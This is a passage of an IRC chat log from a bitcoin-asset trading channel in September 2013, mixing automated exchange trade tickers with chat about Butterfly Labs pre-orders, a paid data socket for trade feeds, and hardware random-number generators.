[BTCTC] [LABCOIN] 2 @ 0.003301 = 0.0066 BTC [+] Sep 07 03:24:31 why the 500btc loan? Sep 07 03:25:24 [BTCTC] [LABCOIN] 1 @ 0.003302 BTC [+] Sep 07 03:25:45 [HAVELOCK] [AM100] 2 @ 0.01900001 = 0.038 BTC [-] Sep 07 03:25:51 [HAVELOCK] [AM100] 1 @ 0.01896 BTC [-] Sep 07 03:25:59 [HAVELOCK] [AM100] 1 @ 0.0189 BTC [-] Sep 07 03:26:05 [HAVELOCK] [AM100] 10 @ 0.01871 = 0.1871 BTC [-] Sep 07 03:26:08 [MPEX] [S.MPOE] 144 @ 0.00088576 = 0.1275 BTC [+] Sep 07 03:26:14 [BTCTC] [LABCOIN] 1 @ 0.003302 BTC [+] Sep 07 03:26:15 [HAVELOCK] [AM100] 3 @ 0.01870002 = 0.0561 BTC [-] Sep 07 03:26:21 [MPEX] [S.MPOE] 9656 @ 0.00088528 = 8.5483 BTC [-] Sep 07 03:26:23 [HAVELOCK] [AM100] 1 @ 0.01860001 BTC [-] Sep 07 03:26:29 [HAVELOCK] [AM100] 10 @ 0.01856 = 0.1856 BTC [-] Sep 07 03:26:33 [HAVELOCK] [AM100] 3 @ 0.0185555 = 0.0557 BTC [-] Sep 07 03:27:18 wtf Sep 07 03:27:30 people just love stealing my ideas Sep 07 03:27:40 oh well Sep 07 03:27:41 i don't know. did he pay the $100k already? if so, it might be cash usd from his own pocket because of the inability to convert that amount of btc Sep 07 03:27:54 [BTCTC] [LABCOIN] 4 @ 0.003302 = 0.0132 BTC [+] Sep 07 03:28:25 [HAVELOCK] [XBOND] 14 @ 0.00107 = 0.015 BTC [+] Sep 07 03:28:28 [HAVELOCK] [XBOND] 519 @ 0.0010799 = 0.5605 BTC [+] Sep 07 03:28:41 [HAVELOCK] [XBOND] 1 @ 0.0010799 BTC [+] Sep 07 03:29:43 [BTCTC] [PETA-MINE] 4 @ 0.6598 = 2.6392 BTC [-] Sep 07 03:34:23 [MPEX] [S.MPOE] 800 @ 0.00088528 = 0.7082 BTC [-] Sep 07 03:35:52 [BTCTC] [LABCOIN] 4 @ 0.003302 = 0.0132 BTC [+] Sep 07 03:38:10 [BTCTC] [LABCOIN] 4 @ 0.003302 = 0.0132 BTC [+] Sep 07 03:38:43 [BTCTC] [DMS.MINING] 34 @ 0.002439 = 0.0829 BTC [+] Sep 07 03:39:25 [HAVELOCK] [SDSTM] 1 @ 0.0031 BTC [-] Sep 07 03:39:52 [HAVELOCK] [SDSTM] 15 @ 0.00329 = 0.0494 BTC [+] Sep 07 03:39:55 [BTCTC] [LABCOIN] 4 @ 0.003302 = 0.0132 BTC [+] Sep 07 03:41:53 [BTCTC] [ACTIVEMINING] 100 @ 0.003841 = 0.3841 BTC [-] Sep 07 03:41:55 [BTCTC] [ACTIVEMINING] 82 @ 0.003839 = 0.3148 BTC [-] Sep 07 03:41:56 [BTCTC] [ACTIVEMINING] 235 @ 0.00382 = 0.8977 BTC [-] Sep 07 03:41:56 [BTCTC] [ACTIVEMINING] 162 @ 0.003803 = 0.6161 BTC [-] Sep 07 03:41:57 [BTCTC] [ACTIVEMINING] 801 @ 0.0038 = 3.0438 BTC [-] Sep 07 03:42:12 [BTCTC] [LABCOIN] 4 @ 0.003302 = 0.0132 BTC [+] Sep 07 03:42:13 [BTCTC] [BTC-GROWTH] 29 @ 0.09901 = 2.8713 BTC [-] Sep 07 03:42:25 [BTCTC] [LABCOIN] 1 @ 0.003303 BTC [+] Sep 07 03:43:26 How many hours left Sep 07 03:43:57 [HAVELOCK] [XBOND] 7 @ 0.001079 = 0.0076 BTC [-] Sep 07 03:43:59 [BTCTC] [LABCOIN] 2 @ 0.003303 = 0.0066 BTC [+] Sep 07 03:43:59 Until we hashin ' 4TH Sep 07 03:45:16 [BTCTC] [ASICMINER-PT] 1 @ 2.199 BTC [-] Sep 07 03:45:41 [BTCTC] [ASICMINER-PT] 1 @ 2.199 BTC [-] Sep 07 03:46:19 [BTCTC] [LABCOIN] 2 @ 0.003303 = 0.0066 BTC [+] Sep 07 03:46:22 [BTCTC] [LABCOIN] 1 @ 0.003304 BTC [+] Sep 07 03:46:24 [BTCTC] [LABCOIN] 2 @ 0.003309 = 0.0066 BTC [+] Sep 07 03:46:25 [BTCTC] [LABCOIN] 1 @ 0.00331 BTC [+] Sep 07 03:46:26 [BTCTC] [LABCOIN] 2 @ 0.003319 = 0.0066 BTC [+] Sep 07 03:46:27 [BTCTC] [LABCOIN] 1 @ 0.00332 BTC [+] Sep 07 03:46:29 [BTCTC] [LABCOIN] 4 @ 0.003377 = 0.0135 BTC [+] Sep 07 03:46:30 [BTCTC] [LABCOIN] 1 @ 0.003378 BTC [+] Sep 07 03:46:31 [BTCTC] [LABCOIN] 1 @ 0.00338 BTC [+] Sep 07 03:46:32 [BTCTC] [LABCOIN] 2 @ 0.003389 = 0.0068 BTC [+] Sep 07 03:46:33 [BTCTC] [LABCOIN] 1 @ 0.00339 BTC [+] Sep 07 03:46:34 [BTCTC] [LABCOIN] 110 @ 0.003407 = 0.3748 BTC [+] Sep 07 03:46:35 [BTCTC] [LABCOIN] 50 @ 0.003409 = 0.1705 BTC [+] Sep 07 03:48:14 [BTCTC] [TAT.ASICMINER] 1 @ 0.02077 BTC [-] Sep 07 03:49:48 who? Sep 07 03:49:51 ;;bc,stats Sep 07 03:49:53 Current Blocks: 256521 | Current Difficulty: 8.693301777119441E7 | Next Difficulty At Block: 258047 | Next Difficulty In: 1526 blocks | Next Difficulty In About: 1 week, 1 day, 10 hours, 20 minutes, and 33 seconds | Next Difficulty Estimate: 103683135.551 | Estimated Percent Change: 19.26784 Sep 07 03:50:17 [BTCTC] [ASICMINER-PT] 2 @ 2.2 = 4.4 BTC [+] Sep 07 03:51:21 https://www.facebook.com/ButterflyLabs/posts/631071773591299 Sep 07 03:52:01 lol Sep 07 03:52:12 while we argue what is "an unit", scammers do theri thing Sep 07 03:52:49 well, it is an interesting idea… it would be better if it was cross-vendor Sep 07 03:53:08 do they take fees? that would be a very bad incentive Sep 07 03:53:11 lmFao jurov Sep 07 03:53:43 how low can you go really.. Sep 07 03:54:10 "we cant deliver so now customers can scam eachother out" Sep 07 03:55:00 wow Sep 07 03:55:02 ;;ticker Sep 07 03:55:03 MtGox BTCUSD ticker | Best bid: 121.30000, Best ask: 121.98999, Bid-ask spread: 0.68999, Last trade: 121.25000, 24 hour volume: 19109.28167753, 24 hour low: 121.25000, 24 hour high: 133.99999, 24 hour vwap: 126.49107 Sep 07 03:55:08 ;;premium mtgox bitstamp Sep 07 03:55:10 mtgox premium over bitstamp is currently 3.1914893617 %. Sep 07 03:55:24 looks like someone took advantage of the arbitrage opportunities huh Sep 07 03:55:48 [BTCTC] [ASICMINER-PT] 2 @ 2.2 = 4.4 BTC [+] Sep 07 03:56:32 to get imaginary dollars? Sep 07 03:56:42 they will buy back btc Sep 07 03:56:45 once it dips Sep 07 03:56:47 to get out. Sep 07 03:56:47 hey kakobrekla since assbot has been open sourced Sep 07 03:56:56 now all the assbot data is available Sep 07 03:57:08 since I paid you I should be allowed to monetize that ;) Sep 07 03:57:11 it has been open sourced? Sep 07 03:57:21 the log Sep 07 03:57:30 master log on bitcoin-assets Sep 07 03:57:37 what is your ip? Sep 07 03:57:44 are you going to block me? Sep 07 03:57:48 on the log? Sep 07 03:57:49 :( Sep 07 03:58:01 ;) Sep 07 03:58:14 i give you cut if i makes monies Sep 07 03:58:22 what's the plan? Sep 07 03:58:25 [BTCTC] [ACTIVEMINING] 3 @ 0.00395 = 0.0119 BTC [+] Sep 07 03:58:27 secret :P Sep 07 03:58:57 ! :(( Sep 07 03:59:19 yeah data is free but the delivery protocol isnt necessarily Sep 07 03:59:34 you mean log.bitcoin-assets.com Sep 07 03:59:35 why not? Sep 07 03:59:51 I should be able to download all the logs, and grep out assbot :P Sep 07 03:59:59 i ment socket. Sep 07 04:00:01 then sell the data Sep 07 04:01:20 feel free to use log data as you plesae Sep 07 04:01:31 its nice if you mention the source Sep 07 04:01:36 and thats about it. Sep 07 04:02:05 [HAVELOCK] [XBOND] 10 @ 0.00104 = 0.0104 BTC [-] Sep 07 04:02:08 [HAVELOCK] [XBOND] 1600 @ 0.00103 = 1.648 BTC [-] Sep 07 04:02:40 there is a forced delay between each trade, right? Sep 07 04:02:54 where? Sep 07 04:02:59 on irc? Sep 07 04:03:02 yes Sep 07 04:03:02 1 second Sep 07 04:03:05 on socket 0 seconds Sep 07 04:03:19 thestringpuller: if you really cant pay for socket, just use rss for mpex Sep 07 04:03:54 that socket, is it only used for assbot and some private users? Sep 07 04:03:56 [BTCTC] [ACTIVEMINING] 10 @ 0.003948 = 0.0395 BTC [-] Sep 07 04:03:58 [BTCTC] [ACTIVEMINING] 10 @ 0.003949 = 0.0395 BTC [+] Sep 07 04:03:59 [BTCTC] [ACTIVEMINING] 52 @ 0.003979 = 0.2069 BTC [+] Sep 07 04:04:00 [BTCTC] [ACTIVEMINING] 52 @ 0.00398 = 0.207 BTC [+] Sep 07 04:04:01 [BTCTC] [ACTIVEMINING] 428 @ 0.004046 = 1.7317 BTC [+] Sep 07 04:04:02 [BTCTC] [ACTIVEMINING] 428 @ 0.004047 = 1.7321 BTC [+] Sep 07 04:04:03 [BTCTC] [ACTIVEMINING] 1 @ 0.004055 BTC [+] Sep 07 04:04:03 [BTCTC] [ACTIVEMINING] 1 @ 0.004056 BTC [+] Sep 07 04:04:04 [BTCTC] [ACTIVEMINING] 239 @ 0.004062 = 0.9708 BTC [+] Sep 07 04:04:06 [BTCTC] [ACTIVEMINING] 114 @ 0.004063 = 0.4632 BTC [+] Sep 07 04:04:27 http://bitcoin-assets.com/mpex-socket/ Sep 07 04:04:32 MPEX Socket | #bitcoin-assets Sep 07 04:04:48 its easy to add any other exchange to that its just there has been no real interest so far Sep 07 04:05:01 apart from mpex Sep 07 04:05:52 [BTCTC] [TAT.ASICMINER] 11 @ 0.02078 = 0.2286 BTC [+] Sep 07 04:06:24 true, but do you really want that? Sep 07 04:06:40 do i want what? Sep 07 04:06:58 add other exhcanges? Sep 07 04:07:02 well, offering a non-delayed data stream for all exchanges :) Sep 07 04:07:15 why not, i just open another socket chan Sep 07 04:07:25 theres already two chans Sep 07 04:07:33 one for mpex stock and one for mpex options Sep 07 04:07:39 [not documented] Sep 07 04:07:41 [BTCTC] [ACTIVEMINING] 10 @ 0.003808 = 0.0381 BTC [-] Sep 07 04:08:09 why not dexX7?! Sep 07 04:08:25 [BTCTC] [ACTIVEMINING] 21 @ 0.004062 = 0.0853 BTC [+] Sep 07 04:09:08 kakobrekla is a slumlord Sep 07 04:09:10 in bitcoin world Sep 07 04:09:16 >:( Sep 07 04:09:38 what? Sep 07 04:09:44 dafuq did i do? Sep 07 04:10:38 how much dat socket cost? Sep 07 04:10:41 30 bitcoin a month? Sep 07 04:10:57 have you missed this Sep 07 04:10:58 03:01.18 ( kakobrekla ) feel free to use log data as you plesae Sep 07 04:10:58 03:01.29 ( kakobrekla ) its nice if you mention the source Sep 07 04:10:58 03:01.33 ( kakobrekla ) and thats about it. Sep 07 04:11:02 socket is 1btc per year. Sep 07 04:11:27 realtime data might offer a significant trading advatance, that's why i asked Sep 07 04:11:37 that is why its 1 btc per year Sep 07 04:12:16 are there many customers? Sep 07 04:12:21 a few Sep 07 04:12:52 dats why he slumlord >:( Sep 07 04:12:54 if you cant get back the 1btc you pay for socket by using the socket then the socket is not for you Sep 07 04:12:57 in 5 year he'll charge Sep 07 04:12:59 10 btc a year Sep 07 04:13:38 whatever. Sep 07 04:13:52 mpex pricing model :D Sep 07 04:14:18 [BTCTC] [KENILWORTH] 3 @ 0.0018 = 0.0054 BTC [+] Sep 07 04:18:13 dat bfl facebook notice Sep 07 04:18:25 "Buyer's" Sep 07 04:18:45 hurp dorp Sep 07 04:23:14 [BTCTC] [BTC-TRADING-PT] 10 @ 1.176 = 11.76 BTC [+] Sep 07 04:25:30 [HAVELOCK] [DEALCO] 2 @ 0.01329 = 0.0266 BTC [-] Sep 07 04:32:33 [BTCTC] [TAT.ASICMINER] 1 @ 0.02079 BTC [+] Sep 07 04:33:38 [BTCTC] [TAT.ASICMINER] 1 @ 0.0208 BTC [+] Sep 07 04:34:07 [BTCTC] [TAT.ASICMINER] 65 @ 0.02083 = 1.354 BTC [+] Sep 07 04:36:09 [BTCTC] [LABCOIN] 70 @ 0.00341 = 0.2387 BTC [+] Sep 07 04:37:17 [BTCTC] [ASICMINER-PT] 1 @ 2.2 BTC [+] Sep 07 04:37:47 [BTCTC] [LABCOIN] 94 @ 0.003411 = 0.3206 BTC [+] Sep 07 04:37:48 [BTCTC] [LABCOIN] 36 @ 0.003413 = 0.1229 BTC [+] Sep 07 04:41:16 [BTCTC] [TAT.ASICMINER] 11 @ 0.02083 = 0.2291 BTC [+] Sep 07 04:42:13 [BTCTC] [TAT.ASICMINER] 50 @ 0.02084 = 1.042 BTC [+] Sep 07 04:45:37 [BTCTC] [TAT.ASICMINER] 5 @ 0.02084 = 0.1042 BTC [+] Sep 07 04:46:45 [BTCTC] [LABCOIN] 240 @ 0.003419 = 0.8206 BTC [+] Sep 07 04:47:03 [BTCTC] [TAT.ASICMINER] 10 @ 0.02084 = 0.2084 BTC [+] Sep 07 04:47:46 [BTCTC] [LABCOIN] 120 @ 0.00342 = 0.4104 BTC [+] Sep 07 04:49:15 [BTCTC] [LABCOIN] 40 @ 0.003485 = 0.1394 BTC [+] Sep 07 04:50:45 [BTCTC] [LABCOIN] 100 @ 0.003485 = 0.3485 BTC [+] Sep 07 04:55:08 [BTCTC] [TAT.ASICMINER] 30 @ 0.02084 = 0.6252 BTC [+] Sep 07 05:02:16 [BTCTC] [BTC-GOLD] 10 @ 0.00554 = 0.0554 BTC [+] Sep 07 05:03:31 [BTCTC] [ASICMINER-PT] 32 @ 2.2 = 70.4 BTC [+] Sep 07 05:07:56 [MPEX] [S.MPOE] 5850 @ 0.00088528 = 5.1789 BTC [-] Sep 07 05:11:56 [BTCTC] [TAT.ASICMINER] 79 @ 0.02084 = 1.6464 BTC [+] Sep 07 05:11:56 [BTCTC] [TAT.ASICMINER] 10 @ 0.02086 = 0.2086 BTC [+] Sep 07 05:14:22 [BTCTC] [TAT.ASICMINER] 100 @ 0.0209 = 2.09 BTC [+] Sep 07 05:14:25 [BTCTC] [ASICMINER-PT] 1 @ 2.29 BTC [+] Sep 07 05:15:21 [BTCTC] [ASICMINER-PT] 2 @ 2.29 = 4.58 BTC [+] Sep 07 05:19:06 [BTCTC] [TAT.ASICMINER] 1 @ 0.0209 BTC [+] Sep 07 05:21:02 [BTCTC] [TAT.ASICMINER] 9 @ 0.0209 = 0.1881 BTC [+] Sep 07 05:25:44 [BTCTC] [TAT.ASICMINER] 100 @ 0.0209 = 2.09 BTC [+] Sep 07 05:26:10 [BTCTC] [TAT.ASICMINER] 100 @ 0.0209 = 2.09 BTC [+] Sep 07 05:28:09 [MPEX] [S.MPOE] 17210 @ 0.00088528 = 15.2357 BTC [-] Sep 07 05:28:11 [MPEX] [S.MPOE] 2240 @ 0.00088512 = 1.9827 BTC [-] Sep 07 05:31:56 [BTCTC] [TAT.ASICMINER] 80 @ 0.0209 = 1.672 BTC [+] Sep 07 05:32:10 [HAVELOCK] [AM1] 10 @ 2 = 20 BTC [-] Sep 07 05:32:23 [BTCTC] [TAT.ASICMINER] 80 @ 0.0209 = 1.672 BTC [+] Sep 07 05:33:44 [HAVELOCK] [DEALCO] 5 @ 0.0125 = 0.0625 BTC [-] Sep 07 05:35:38 [BTCTC] [TAT.ASICMINER] 1 @ 0.0208 BTC [-] Sep 07 05:35:39 [BTCTC] [TAT.ASICMINER] 19 @ 0.02079 = 0.395 BTC [-] Sep 07 05:35:41 [BTCTC] [TAT.ASICMINER] 2 @ 0.0205 = 0.041 BTC [-] Sep 07 05:35:42 [BTCTC] [TAT.ASICMINER] 5 @ 0.0204 = 0.102 BTC [-] Sep 07 05:35:43 [BTCTC] [TAT.ASICMINER] 5 @ 0.02021 = 0.1011 BTC [-] Sep 07 05:35:44 [BTCTC] [TAT.ASICMINER] 28 @ 0.0202 = 0.5656 BTC [-] Sep 07 05:35:44 [BTCTC] [TAT.ASICMINER] 95 @ 0.02003 = 1.9029 BTC [-] Sep 07 05:35:45 [BTCTC] [TAT.ASICMINER] 461 @ 0.02002 = 9.2292 BTC [-] Sep 07 05:35:46 [BTCTC] [TAT.ASICMINER] 50 @ 0.02002 = 1.001 BTC [-] Sep 07 05:35:47 [BTCTC] [TAT.ASICMINER] 4 @ 0.02 = 0.08 BTC [-] Sep 07 05:37:01 [BTCTC] [TAT.ASICMINER] 31 @ 0.02089 = 0.6476 BTC [+] Sep 07 05:39:04 [BTCTC] [TAT.ASICMINER] 1 @ 0.02089 BTC [+] Sep 07 05:40:23 [HAVELOCK] [SMG] 4 @ 0.0001921 = 0.0008 BTC [-] Sep 07 05:49:48 [HAVELOCK] [DEALCO] 7 @ 0.0124 = 0.0868 BTC [-] Sep 07 05:49:51 [HAVELOCK] [DEALCO] 8 @ 0.012 = 0.096 BTC [-] Sep 07 05:49:53 [HAVELOCK] [DEALCO] 50 @ 0.0111 = 0.555 BTC [-] Sep 07 05:49:55 [HAVELOCK] [DEALCO] 20 @ 0.01105002 = 0.221 BTC [-] Sep 07 05:49:57 [HAVELOCK] [DEALCO] 134 @ 0.01105001 = 1.4807 BTC [-] Sep 07 05:49:59 [HAVELOCK] [DEALCO] 17 @ 0.01105 = 0.1879 BTC [-] Sep 07 05:50:00 [HAVELOCK] [DEALCO] 2 @ 0.0106 = 0.0212 BTC [-] Sep 07 05:50:03 [HAVELOCK] [DEALCO] 4 @ 0.0101 = 0.0404 BTC [-] Sep 07 05:50:05 [HAVELOCK] [DEALCO] 1 @ 0.01 BTC [-] Sep 07 05:50:07 [HAVELOCK] [DEALCO] 100 @ 0.01 = 1 BTC [-] Sep 07 05:51:36 [HAVELOCK] [DEALCO] 4 @ 0.0096 = 0.0384 BTC [-] Sep 07 05:51:39 [HAVELOCK] [DEALCO] 4 @ 0.0091 = 0.0364 BTC [-] Sep 07 05:51:41 [HAVELOCK] [DEALCO] 395 @ 0.003 = 1.185 BTC [-] Sep 07 05:52:00 nice tanking Sep 07 05:52:25 what was ipo price? Sep 07 05:53:17 .01 i believe Sep 07 05:54:32 ya .01 Sep 07 05:55:37 ouch Sep 07 05:58:37 the guy filled all bids but one (well, partially) Sep 07 05:58:39 weird Sep 07 05:59:28 i'm scared....again Sep 07 06:02:13 only about 3 BTC volume? Sep 07 06:05:51 [HAVELOCK] [DEALCO] 1 @ 0.01329 BTC [+] Sep 07 06:14:56 [HAVELOCK] [DEALCO] 1 @ 0.0063864 BTC [-] Sep 07 06:23:46 [HAVELOCK] [DEALCO] 12 @ 0.0051 = 0.0612 BTC [-] Sep 07 06:30:05 [BTCTC] [TAT.ASICMINER] 3 @ 0.02012 = 0.0604 BTC [-] Sep 07 06:33:58 [HAVELOCK] [AM100] 2 @ 0.01999 = 0.04 BTC [+] Sep 07 06:37:55 http://i.imgur.com/XbnKclR.png Sep 07 06:38:19 http://www.reddit.com/r/Bitcoin/comments/1lvqlc/now_you_can_sell_your_bfl_preorder_or_buy_a_spot/ Sep 07 06:38:22 Now you can sell your BFL pre-order, or buy a spot in line. : Bitcoin Sep 07 06:38:25 lolol Sep 07 06:50:31 [HAVELOCK] [AM100] 3 @ 0.019 = 0.057 BTC [-] Sep 07 06:52:27 [BTCTC] [LABCOIN] 1 @ 0.003343 BTC [-] Sep 07 06:52:28 [BTCTC] [LABCOIN] 5 @ 0.003342 = 0.0167 BTC [-] Sep 07 06:52:30 [BTCTC] [LABCOIN] 30 @ 0.003325 = 0.0998 BTC [-] Sep 07 06:52:30 [BTCTC] [LABCOIN] 3 @ 0.003324 = 0.01 BTC [-] Sep 07 06:54:03 [BTCTC] [ACTIVEMINING] 1 @ 0.004 BTC [-] Sep 07 06:54:05 [BTCTC] [ACTIVEMINING] 99 @ 0.004 = 0.396 BTC [-] Sep 07 06:57:38 [MPEX] [S.MPOE] 384 @ 0.00088512 = 0.3399 BTC [-] Sep 07 06:57:39 [MPEX] [S.MPOE] 4550 @ 0.00088322 = 4.0187 BTC [-] Sep 07 06:57:52 [MPEX] [S.MPOE] 2558 @ 0.00088135 = 2.2545 BTC [-] Sep 07 06:58:16 [HAVELOCK] [AM100] 8 @ 0.01999 = 0.1599 BTC [+] Sep 07 07:02:47 jurov "an unit" sorta has this "an hero" flavour to it. maybe it becomes a meme Sep 07 07:06:26 http://comments.gmane.org/gmane.comp.security.cryptography.randombit/4689 Sep 07 07:06:32 List for general discussion of cryptography, particularly focused on technical matters Sep 07 07:06:33 re the entire linux rng discussion Sep 07 07:11:04 [MPEX] [S.MPOE] 4055 @ 0.00088642 = 3.5944 BTC [+] Sep 07 07:11:05 [MPEX] [S.MPOE] 1250 @ 0.00088653 = 1.1082 BTC [+] Sep 07 07:11:10 [MPEX] [S.MPOE] 2645 @ 0.00088656 = 2.345 BTC [+] Sep 07 07:12:48 [BTCTC] [LABCOIN] 24 @ 0.003443 = 0.0826 BTC [+] Sep 07 07:13:00 [BTCTC] [ACTIVEMINING] 7 @ 0.004061 = 0.0284 BTC [+] Sep 07 07:16:40 [BTCTC] [DMS.MINING] 15 @ 0.002439 = 0.0366 BTC [+] Sep 07 07:20:29 [BTCTC] [TAT.ASICMINER] 65 @ 0.02069 = 1.3449 BTC [+] Sep 07 07:20:30 [BTCTC] [TAT.ASICMINER] 10 @ 0.02069 = 0.2069 BTC [+] Sep 07 07:22:37 [BTCTC] [DMS.MINING] 8 @ 0.002439 = 0.0195 BTC [+] Sep 07 07:24:18 [HAVELOCK] [AM100] 9 @ 0.02 = 0.18 BTC [+] Sep 07 07:26:53 [BTCTC] [LABCOIN] 5 @ 0.003333 = 0.0167 BTC [-] Sep 07 07:26:54 [BTCTC] [LABCOIN] 104 @ 0.003333 = 0.3466 BTC [-] Sep 07 07:26:55 [BTCTC] [LABCOIN] 117 @ 0.003332 = 0.3898 BTC [-] Sep 07 07:28:08 [BTCTC] [ACTIVEMINING] 2901 @ 0.004 = 11.604 BTC [-] Sep 07 07:34:42 [BTCTC] [LABCOIN] 3 @ 0.003329 = 0.01 BTC [-] Sep 07 07:35:29 [BTCTC] [LABCOIN] 1 @ 0.003302 BTC [-] Sep 07 07:36:20 [HAVELOCK] [XBOND] 1 @ 0.001079 BTC [+] Sep 07 07:38:57 [BTCTC] [ACTIVEMINING] 194 @ 0.003889 = 0.7545 BTC [-] Sep 07 07:38:59 [BTCTC] [ACTIVEMINING] 28 @ 0.003886 = 0.1088 BTC [-] Sep 07 07:39:00 [BTCTC] [ACTIVEMINING] 10 @ 0.003885 = 0.0389 BTC [-] Sep 07 07:39:01 [BTCTC] [ACTIVEMINING] 105 @ 0.003882 = 0.4076 BTC [-] Sep 07 07:39:02 [BTCTC] [ACTIVEMINING] 25 @ 0.003841 = 0.096 BTC [-] Sep 07 07:39:04 [BTCTC] [ACTIVEMINING] 100 @ 0.00384 = 0.384 BTC [-] Sep 07 07:39:05 [BTCTC] [ACTIVEMINING] 423 @ 0.003804 = 1.6091 BTC [-] Sep 07 07:39:06 [BTCTC] [ACTIVEMINING] 199 @ 0.0038 = 0.7562 BTC [-] Sep 07 07:39:06 [BTCTC] [ACTIVEMINING] 1216 @ 0.0038 = 4.6208 BTC [-] Sep 07 07:44:39 [BTCTC] [ASICMINER-PT] 1 @ 2.28 BTC [-] Sep 07 07:46:15 [BTCTC] [ACTIVEMINING] 12 @ 0.003891 = 0.0467 BTC [+] Sep 07 07:46:17 [BTCTC] [ACTIVEMINING] 50 @ 0.00389 = 0.1945 BTC [-] Sep 07 07:48:28 [HAVELOCK] [DEALCO] 1 @ 0.01 BTC [+] Sep 07 07:48:37 [HAVELOCK] [DEALCO] 1 @ 0.00666666 BTC [-] Sep 07 07:50:28 [BTCTC] [ACTIVEMINING] 22 @ 0.003813 = 0.0839 BTC [-] Sep 07 07:50:42 [HAVELOCK] [DEALCO] 1 @ 0.012 BTC [+] Sep 07 07:51:14 [BTCTC] [ACTIVEMINING] 70 @ 0.003812 = 0.2668 BTC [-] Sep 07 07:53:01 [HAVELOCK] [DEALCO] 1 @ 0.00666666 BTC [-] **** BEGIN LOGGING AT Sat Sep 7 15:54:37 2013 Sep 07 15:54:43 https://bitcointalk.org/index.php?topic=252531.msg3099262#msg3099262 Sep 07 15:54:49 [ActiveMining] The Official Active Mining Discussion Thread Sep 07 15:55:09 benkay this trend to make the browser central to computing is retarded. Sep 07 15:55:35 there's no need for phones that are "entertainment centers" nor for browsers that are abstractions of the os. Sep 07 15:56:50 pankkake lol did kleeck ignore you after that ? Sep 07 15:57:09 wasn't my post Sep 07 15:57:18 ;;nethash Sep 07 15:57:19 754010.73283 Sep 07 15:57:58 only 3x what they predicted lolz. Sep 07 15:58:38 "Why should the owners of two different exchanges spend their time and money to develop a protocol for transferring shares? How would it benefit either of them?" Sep 07 15:58:44 LorenzoMoney you're a retard aren't you. Sep 07 15:59:29 i need to stop following these links. i have people insulating me from the idiocy for a reason. Sep 07 16:05:48 [MPEX] [S.MPOE] 5776 @ 0.00088357 = 5.1035 BTC [-] Sep 07 16:06:59 i only trust Lorenzo Sanchez Sep 07 16:07:53 +1 mircea_popescu Sep 07 16:08:54 [BTCTC] [BTC-TRADING-PT] 2 @ 1.028 = 2.056 BTC [-] Sep 07 16:08:58 also in case anyone's missed it, trilema coments are like the shit these days : http://trilema.com/2013/anonimity-not-for-the-poor/#comment-94888 Sep 07 16:09:10 apparently linus t was complicit in weakening linux rng implementation. Sep 07 16:11:52 [BTCTC] [ACTIVEMINING] 3 @ 0.003867 = 0.0116 BTC [+] Sep 07 16:13:46 [BTCTC] [ACTIVEMINING] 10 @ 0.003867 = 0.0387 BTC [+] Sep 07 16:14:44 I've been wanting an http://www.entropykey.co.uk/ for a while Sep 07 16:14:51 "Please note that there is a very long waiting period for Entropy Keys at the moment." oh well… Sep 07 16:15:16 [BTCTC] [TAT.ASICMINER] 2 @ 0.02126 = 0.0425 BTC [+] Sep 07 16:15:41 [BTCTC] [TAT.ASICMINER] 1 @ 0.02129 BTC [+] Sep 07 16:15:42 [BTCTC] [LABCOIN] 10 @ 0.003357 = 0.0336 BTC [+] Sep 07 16:15:43 [BTCTC] [LABCOIN] 20 @ 0.003358 = 0.0672 BTC [+] Sep 07 16:15:44 [BTCTC] [TAT.ASICMINER] 2 @ 0.02129 = 0.0426 BTC [+] Sep 07 16:15:45 [BTCTC] [LABCOIN] 5 @ 0.003358 = 0.0168 BTC [+] Sep 07 16:15:47 [BTCTC] [LABCOIN] 10 @ 0.003365 = 0.0337 BTC [+] Sep 07 16:15:48 [BTCTC] [LABCOIN] 212 @ 0.003384 = 0.7174 BTC [+] Sep 07 16:15:49 [BTCTC] [LABCOIN] 424 @ 0.003386 = 1.4357 BTC [+] Sep 07 16:15:50 [BTCTC] [LABCOIN] 1345 @ 0.003392 = 4.5622 BTC [+] Sep 07 16:15:50 [BTCTC] [LABCOIN] 3000 @ 0.003393 = 10.179 BTC [+] Sep 07 16:16:18 https://code.google.com/p/csrng/ is interesting too Sep 07 16:16:20 pankkake you know one of the bright minds that made asics or wanted to make asics but didn't get to it in time should make a stick like that. Sep 07 16:16:20 csrng - Sep 07 16:17:03 "The Entropy Key contains two high-quality noise generators, and an ARM Cortex CPU that actively measures, checks and confirms all generated random numbers" Sep 07 16:17:11 honestly i doubt these know wtf they're talking about. Sep 07 16:17:18 "two" ? which two ? what do they do ? Sep 07 16:17:27 how's an arm chip "check" random numbers ? Sep 07 16:17:48 [BTCTC] [ACTIVEMINING] 10 @ 0.003868 = 0.0387 BTC [+] Sep 07 16:18:15 [MPEX] [S.MPOE] 2654 @ 0.00088381 = 2.3456 BTC [+] Sep 07 16:18:38 I tried a thing to make audio an source of entropy, but couldn't get it to work Sep 07 16:19:00 why not ? Sep 07 16:19:27 [BTCTC] [ACTIVEMINING] 10 @ 0.003868 = 0.0387 BTC [+] Sep 07 16:19:45 I don't remember. maybe it was really old and wanted OSS which I had disabled Sep 07 16:20:07 http://www.entropykey.co.uk/tech/ and the pdf gives somewhat of an explanation, not that I can validate it Sep 07 16:20:11 Simtec Electronics Entropy Key: USB True Random Number Generator Sep 07 16:22:27 avalanche noise Sep 07 16:23:45 [BTCTC] [LABCOIN] 310 @ 0.003402 = 1.0546 BTC [+] Sep 07 16:23:52 The streams are also exclusive-ORed together and that stream's entropy is estimated in the same manner. If the raw streams appear to have severely reduced entropy then it indicates a fault in that generator, if the third stream has low entropy then it indicates that the generators have correlated and are not independently gathering entropy. Sep 07 16:23:56 that's a good test at least. Sep 07 16:24:35 [BTCTC] [LABCOIN] 30 @ 0.003406 = 0.1022 BTC [+] Sep 07 16:25:45 [BTCTC] [ACTIVEMINING] 12 @ 0.003865 = 0.0464 BTC [-] Sep 07 16:27:20 [BTCTC] [RSM] 10 @ 0.008205 = 0.0821 BTC [+] Sep 07 16:29:36 [BTCTC] [LABCOIN] 182 @ 0.003406 = 0.6199 BTC [+] Sep 07 16:30:01 [BTCTC] [ACTIVEMINING] 13 @ 0.003869 = 0.0503 BTC [+] Sep 07 16:30:50 [BTCTC] [LABCOIN] 179 @ 0.003406 = 0.6097 BTC [+] Sep 07 16:31:16 [BTCTC] [ASICMINER-PT] 1 @ 2.18 BTC [-] Sep 07 16:31:40 "Shortly before the first release, I read an article about the ongoing Sep 07 16:31:40 Bitkeeper debacle that described Larry McVoy as mercurial (in the sense Sep 07 16:31:40 of 'fickle'). Given the multiple meanings, the convenient abbreviation, Sep 07 16:31:40 and the good fit with my pre-existing naming scheme (see my email Sep 07 16:31:40 address), it 